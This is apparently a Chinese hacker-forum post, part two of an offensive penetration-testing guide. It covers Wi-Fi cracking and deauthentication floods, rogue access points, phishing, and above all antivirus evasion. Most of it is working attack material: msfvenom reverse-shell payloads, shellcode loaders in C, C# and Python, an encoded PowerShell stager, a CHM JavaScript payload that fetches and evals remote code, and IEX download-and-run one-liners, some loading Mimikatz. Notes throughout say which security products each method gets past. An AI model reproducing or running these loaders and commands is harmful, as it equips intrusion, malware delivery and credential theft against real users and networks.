• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

黑客是怎么入侵网站的?全世界首篇最详细渗透测试中文文章(第2部分)


This Wind

Recommended Posts

近源攻击

WI-FI破解

wifite

Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill
#airmon-ng start wlan1
安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本
#apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
#git clone https://github.com/ZerBea/hcxtools
#cd hcxtools
#make
#make install 
#git clone https://github.com/ZerBea/hcxdumptool
#cd hcxdumptool
#make
#make install
#wifite –-dict /root/Desktop/wordlist.txt  加载

Aircrack-ng

#airmon-ng start wlan0 开启监听模式
#airodump-ng wlan0mon  查看数据包
#airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包
#aireplay-ng –deauth 10 –a APmac wlan0mon  deauth攻击
#aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth攻击某个设备直至获取handshake(握手包)
#airmon-ng stop wlan0mon  关闭监听模式
#aircrack-ng –w wordlist.txt name.cap 指定字典破解密码

钓鱼网络

Hostapd

#apt install hostapd dnsmasq
#cd /etc/hostapd
#vim open.conf 创建无加密热点
Interface=wlan1
Ssid=FreeWIFI
Driver=nl80211
Channel=1
Hw_mode=g

#vim /etc/dnsmasq.conf
Dhcp-range=10.0.0.1, 10.0.0.255,12h
Interface=wlan1

#systemctl restart dnsmasq
消除网卡限制
#nmcli radio wifi off
#rfkill unblock wlan
#ifconfig wlan1 10.0.0.1/24
#hostapd open.conf
嗅探
#sysctl –w net.ipv4.ip_forward=1
#iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE
#bettercap –iface wlan1
#net.show
#net.sniff on
#driftnet –i wlan1

Hostapd-wpe

#apt install hostapd-wpe
#vim /etc/hostapd-wpe/hostapd-wpe.conf
配置interface=wlan1
Ssid=
Channel=
证书修改
#cd /etc/hostapd-wpe/certs/
文件ca.cnf server.cnf client.cnf
修改countrName stateOrProvinceName localityName …….
#rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
#make clean
#./bootstrap
#make install
执行创建热点
#hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
获取到密码时使用asleep破解
#asleap –C Challenge值 –R response值 –W 字典文件

无线干扰

Beacon flood

需切换网卡为监听模式
#airmon-ng start wlan1
创建大量虚假热点Mdk3 mon0 b
#mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500

Deauth flood

针对AP
#airmon-ng start wlan1
#aireplay-ng –deauth 10 –a AP’s mac address mon0
针对AP内设备
#airmon-ng start wlan1       将网卡置为监听模式
#airodump-ng wlan1mon –bssid 目标ap的ssid
#aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon 开始攻击

Mdk3 destruction

针对范围内
#mdk3 wlan1mon d
针对AP
#airodump-ng wlan1mon
#mdk3 wlan1mon a -a APmac 发起攻击
黑名单
#mdk3 wlan1mon d –c 信道 –b /blacklist.txt.
#mdk3 wlan1mon  b -n test -w -g -c 1 -s 200

WiFi芯片esp8266

Mdk4

#mdk4 wlan0mon d

CVE-2018-4407

Scapy
send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备

绕过mac地址认证

Ifconfig
#ifconfig wlan1 down
#ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
#ifconfig wlan1 up
Macchanger
#macchanger –m xx:xx:xx:xx:xx:xx wlan1
#macchanger –r wlan1

BadUSB

克隆卡

蓝牙

鱼叉式攻击

钓鱼邮件

假冒的内部域名
假冒的外部域名
近似域名
被黑账户
群发/特定发
虚构情景/恶意连接/恶意文件

CVE

CVE-2017-11882
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016
CVE-2017-0199
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016,Vista SP2,Server 2008 SP2,Windows 7 SP1,Windows 8.1
CVE-2012-0158
Microsoft Office 2003 SP3、2007 SP2和SP3,以及2010 Gold和SP1;Office 2003 Web组件SP3;SQL Server 2000 SP4、2005 SP4和2008 SP2,SP3和R2; BizTalk Server 2002 SP1;Commerce Server 2002 SP4、2007 SP2和2009 Gold和R2; Visual FoxPro 8.0 SP1和9.0 SP2; 和Visual Basic 6.0
CVE-2017-0143
Microsoft Windows Vista SP2;Windows Server 2008 SP2和R2 SP1; Windows 7 SP1;Windows 8.1; Windows Server 2012 Gold和R2;Windows RT 8.1;Windows 10 Gold,1511和1607;以及 和Windows Server 2016
OFFICE文档/ PDF文件

可执行文件

文档文件的伪造

扩展名/图标

捆绑

0day

CHM

使用编译的HTML文件加载恶意代码。
使用EasyCHM对html进行编译,在html文件中插入恶意代码。
使用MSF生成powershell格式的web_delivery模块
使用Rundll32配合MyJSRAT实施运行无弹窗

image

把命令base编码避免特殊符号

image

执行语句编码后
>powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==
通过JSRat执行powershell上线命令
https://github.com/Ridter/MyJSRat
>python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA=="

image

访问http://ip/wtf复制利用语句到html文件后编译

image

<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>

image

正常打开CHM文件,无弹窗上线。

image

钓鱼链接

URL跳转

结合恶意文档或程序

短URL

结合水坑攻击

相似域名

域名窃取

第三方服务鱼叉

通过社交软件建立关系,如男女朋友,师父徒弟,HR,寻求业务等进行钓鱼攻击

免杀

MSF免杀

nps_payload

>python nps_payload.py正常生成
>msfconsole -r msbuild_nps.rc开启监听
>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
正常执行结束进程msbuild会失去会话,以下保存bat执行
获得session后立刻迁移进程
@echo off
echo [*] Please Wait, preparing software ..
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
exit

编码器

>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov 编码进行免杀
>set stageencodingfallback false
&
>msfvenom --list encoders列出编码器

c/c++源码免杀

>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
-i编码20次
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe

指针执行

unsigned char buf[] =
"shellcode";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
main()
{
	( (void(*)(void))&buf)();
}
使用vc6.0组建编译后在靶机执行

image

当前过不了火绒,360动态静态可过

申请动态内存

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
unsigned char buf[] =
"shellcode";
main()
{
	char *Memory;
	Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, buf, sizeof(buf));
	((void(*)())Memory)();
}

嵌入汇编

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
	__asm
	{
		mov eax, offset shellcode
		jmp eax
	}
}

强制类型转换

#include <windows.h>
#include <stdio.h>
unsigned char buf[] ="";
void main()
{
 ((void(WINAPI*)(void))&buf)();
}

汇编花指令

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
void main()
{
		__asm
	{
		mov eax, offset shellcode
		_emit 0xFF  
		_emit 0xE0
	}
}

XOR加密

https://github.com/Arno0x/ShellcodeWrapper安装
生成raw格式木马
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw

image

加密
> python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
生成的py文件使用py2exe编译执行
生成的cs文件使用csc.exe编译执行
生成的cpp文件使用vc6.0编译,去掉预编译头编译执行

image

远程线程注入

目前过火绒,不过360,可组合一下
Vs新建c++控制台程序
右键属性-》将MFC的使用选为在静态库中使用MFC
生成c格式shellcode粘贴进remote inject.cpp

image

生成项目
能成功上线,并开启calc进程

image image

加载器免杀

shellcode_launcher
https://github.com/clinicallyinane/shellcode_launcher/
生成payload(raw)
>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
加载器加载
>shellcode_launcher.exe -i shellcode.raw
SSI加载
https://github.com/DimopoulosElias/SimpleShellcodeInjector
生成payload(c)
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
执行
>cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

image

MSF监听
可使用minGW自行编译
>gcc SimpleShellcodeInjector.c -o xxx.exe
执行
>xxx.exe +生成的编码

c#源码免杀

直接编译

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
MSF启动监听
Payload粘贴到位置
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
	class Program
	{
		static void Main(string[] args)
		{
			byte[] shellcode = new byte[] {payload here};
			UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
			Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
			IntPtr hThread = IntPtr.Zero;
			UInt32 threadId = 0;
			// prepare data
			IntPtr pinfo = IntPtr.Zero;
			// execute native code
			hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
		private static UInt32 MEM_COMMIT = 0x1000;
		private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
		[DllImport("kernel32")]
		private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
		UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
		[DllImport("kernel32")]
		private static extern bool VirtualFree(IntPtr lpAddress,
		UInt32 dwSize, UInt32 dwFreeType);
		[DllImport("kernel32")]
		private static extern IntPtr CreateThread(
			UInt32 lpThreadAttributes,
			UInt32 dwStackSize,
			UInt32 lpStartAddress,
			IntPtr param,
			UInt32 dwCreationFlags,
			ref UInt32 lpThreadId
		);
		[DllImport("kernel32")]
		private static extern bool CloseHandle(IntPtr handle);
		[DllImport("kernel32")]
		private static extern UInt32 WaitForSingleObject(
			IntPtr hHandle,
			UInt32 dwMilliseconds
		);
		[DllImport("kernel32")]
		private static extern IntPtr GetModuleHandle(
			string moduleName
		);
		[DllImport("kernel32")]
		private static extern UInt32 GetProcAddress(
			IntPtr hModule,
			string procName
		);
		[DllImport("kernel32")]
		private static extern UInt32 LoadLibrary(
			string lpFileName
		);
		[DllImport("kernel32")]
		private static extern UInt32 GetLastError();
	}
}
Visual studio创建C#.net framework控制台程序编译可过杀软

加密处理

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
粘贴payload后编译加密
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace Payload_Encrypt_Maker
{
	class Program
	{
		// 加密密钥,可以更改,加解密源码中保持KEY一致就行
		static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
		static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
		static byte[] payload = { payload here };    // 替换成MSF生成的shellcode
		private static class Encryption_Class
		{
			public static string Encrypt(string key, string data)
			{
				Encoding unicode = Encoding.Unicode;
				return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
			}
			public static byte[] Encrypt(byte[] key, byte[] data)
			{
				return EncryptOutput(key, data).ToArray();
			}
			private static byte[] EncryptInitalize(byte[] key)
			{
				byte[] s = Enumerable.Range(0, 256)
				.Select(i => (byte)i)
				.ToArray();
				for (int i = 0, j = 0; i < 256; i++)
				{
					j = (j + key[i % key.Length] + s[i]) & 255;
					Swap(s, i, j);
				}
				return s;
			}
			private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
			{
				byte[] s = EncryptInitalize(key);
				int i = 0;
				int j = 0;
				return data.Select((b) =>
				{
					i = (i + 1) & 255;
					j = (j + s[i]) & 255;
					Swap(s, i, j);
					return (byte)(b ^ s[(s[i] + s[j]) & 255]);
				});
			}
			private static void Swap(byte[] s, int i, int j)
			{
				byte c = s[i];
				s[i] = s[j];
				s[j] = c;
			}
		}
		static void Main(string[] args)
		{
			byte[] result = Encryption_Class.Encrypt(KEY, payload);
			int b = 0;
			for (int i = 0; i < result.Length; i++)
			{
				b++;
				if (i == result.Length + 1)
				{ Console.Write(result[i].ToString()); }
				if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
			}
		}
	}
}

image

编译解密
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Threading;
using System.Reflection;
using System.Runtime.CompilerServices;

namespace NativePayload_Reverse_tcp
{
	public class Program
{
		public static void Main()
		{
			Shellcode.Exec();
  }
}
class Shellcode
{
  public static void Exec()
  {
    string Payload_Encrypted;
    Payload_Encrypted = "payload here";
    string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
    byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
    for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
    {
      byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
      _X_to_Bytes[i] = current;
    }
    // 解密密钥,可以更改,加解密源码中保持KEY一致就行
			byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
			byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
			// 加载shellcode
			IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
			Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
			CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
			Thread.Sleep(2000);
		}
		public static byte[] Decrypt(byte[] key, byte[] data)
		{
			return EncryptOutput(key, data).ToArray();
		}
		private static byte[] EncryptInitalize(byte[] key)
		{
			byte[] s = Enumerable.Range(0, 256)
			.Select(i => (byte)i)
			.ToArray();
			for (int i = 0, j = 0; i < 256; i++)
			{
				j = (j + key[i % key.Length] + s[i]) & 255;
				Swap(s, i, j);
			}
			return s;
		}
		private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
		{
			byte[] s = EncryptInitalize(key);
			int i = 0;
			int j = 0;
			return data.Select((b) =>
			{
				i = (i + 1) & 255;
				j = (j + s[i]) & 255;
				Swap(s, i, j);
				return (byte)(b ^ s[(s[i] + s[j]) & 255]);
				});
		}
		private static void Swap(byte[] s, int i, int j)
		{
			byte c = s[i];
			s[i] = s[j];
			s[j] = c;
		}
		[DllImport("kernel32.dll")]
		public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	}
}

XOR/AES编码

与上文xor加密类似

CSC+InstallUtil

生成payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译

image

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs

image

执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

Python源码免杀

pyinstaller加载C代码编译

生成C格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe
>python pyinstaller-script.py -F -w shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载py代码编译(*)

生成py格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe
>python pyinstaller-script.py --console --onefile shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

image image image

Py2exe打包exe

生成raw格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
在32位系统上安装python、py2exe
创建setup.py放置同一目录

image

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
执行打包命令
>python setup.py py2exe
会在当前目录生成dist文件夹,打包好的exe在里面

image

Base64编码+Pyinstaller打包

MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Shellcode粘贴在shellcode+base64+c.py中
>python pyinstaller-script.py -F -w shellcode.py
会在目录下生成dist文件夹,exe文件就在里面

加载器分离

hex
生成c格式payload
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

使用
https://github.com/k8gege/scrun

image

或
>python scrun.py xxx
或
编译ScRunHex.py为exe
Base64(*)
生成c格式payload
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

进行hex编码后,粘贴进去base64编码

image

看系统位数编译ScRunBase.py文件,使用pyinstaller打包为exe后执行
https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

image image

DLL劫持

白dll劫持
Processmonitor查找程序加载的dll
使用stud_pe加载dll进去
或
生成payload免杀好粘贴进去,查看目标上有什么软件,本地查找可劫持的dll,劫持好文件后传上去。

image

MSBuild

链接
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
远程执行
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
要设置自动迁移进程

image

GreatSCT

>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Mshta

https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
生成
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
>cat 1.bin |base64 -w 0

image

编码后的内容复制到

image

执行
>mshta http://192.168.0.106:1222/1.hta
360执行检测出来,静态动态无法检测、火绒无法检测

InstallUtil

内网文章中有介绍

Veil

>use 1选择evasion模块
>list查看可用payload
>use 7 选择c格式的payload
>set LHOST/LPORT设置回连IP和端口
>generate生成

image

直接生成的exe可能会被查杀,目前可过360,不能过火绒
使用minGW-w64编译C文件
>gcc -o vel.exe veil.c -l ws2_32

RC4

>msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

捆绑

>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe  -i 15 -f exe -o /var/www/html/payload4.exe

Evasion模块

>show evasion

Phantom-Evasion

image image

Shellter

仅支持32位程序
>apt install shellter
指定一个exe文件

image

选择payload

the-backdoor-factory

查看是否支持捆绑
>python backdoor.py -f /root/Desktop/putty.exe -S
查看此文件支持哪些payload
>python backdoor.py -f /root/Desktop/putty.exe -s show
reverse_shell_tcp_inline对应msf
set payload windows/meterpreter/reverse_tcp
meterpreter_reverse_https_threaded应msf
set payload windows/meterpreter/reverse_https
iat_reverse_tcp_stager_threaded修复IAT
user_supplied_shellcode_threaded自定义payload
参数
-s 指定payload
-H 回连地址
-P 回连端口
-J 多代码裂缝注入
>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
后门生成在backdoored目录
或
生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
自定义
>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

zirikatu

image

hanzoInjection

https://github.com/P0cL4bs/hanzoInjection
生成
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
>HanzoInjection.exe -p 1.bin -o 1.cs
编译1.cs
属性-生成-允许不安全代码

PowerShell免杀

直接生成

>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
执行
>powershell -ep bypass -noexit -file 1.ps1
Powershell行为检测bypass
>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

Invoke-Shellcode加载

生成code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
目标执行
> powershell -ep bypass
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
> Invoke-Shellcode -Shellcode ($buf) -Force

image image

防护软件没反应

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation
生成code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
>powershell -ep bypass
>Import-Module .\Invoke-Obfuscation.psd1
>Invoke-Obfuscation
>set scriptpath C:\Users\y\Desktop\1.ps1
>encoding
>3 指定编码方式
>out C:\Users\y\Desktop\ok.ps1 保存

image image

执行
>powershell -ep bypass -noexit -file ok.ps1

image image image

Xencrypt

https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100 递归分层躲避动态查杀

image

>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

image image

PyFuscation

https://github.com/CBHue/PyFuscation
对函数,参数,变量进行混淆
>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

image image

拆分+C编译

#include<stdio.h>
#include<stdlib.h>
int main(){
system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
return 0;
}

行为检测

>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Out-EncryptedScript

http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

image image

PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
PS > [String] $cmd = Get-Content .\evil.ps1
PS > Invoke-Expression $cmd
PS > $decrypted = de shabiisme 123456
PS > Invoke-Expression $decrypted
PS > Invoke-Mimikatz

cobalt strike powershell免杀

From: https://y4er.com/post/cobalt-strike-powershell-bypass/
powershell>$string = ''
powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[cs生成的shellcode]')
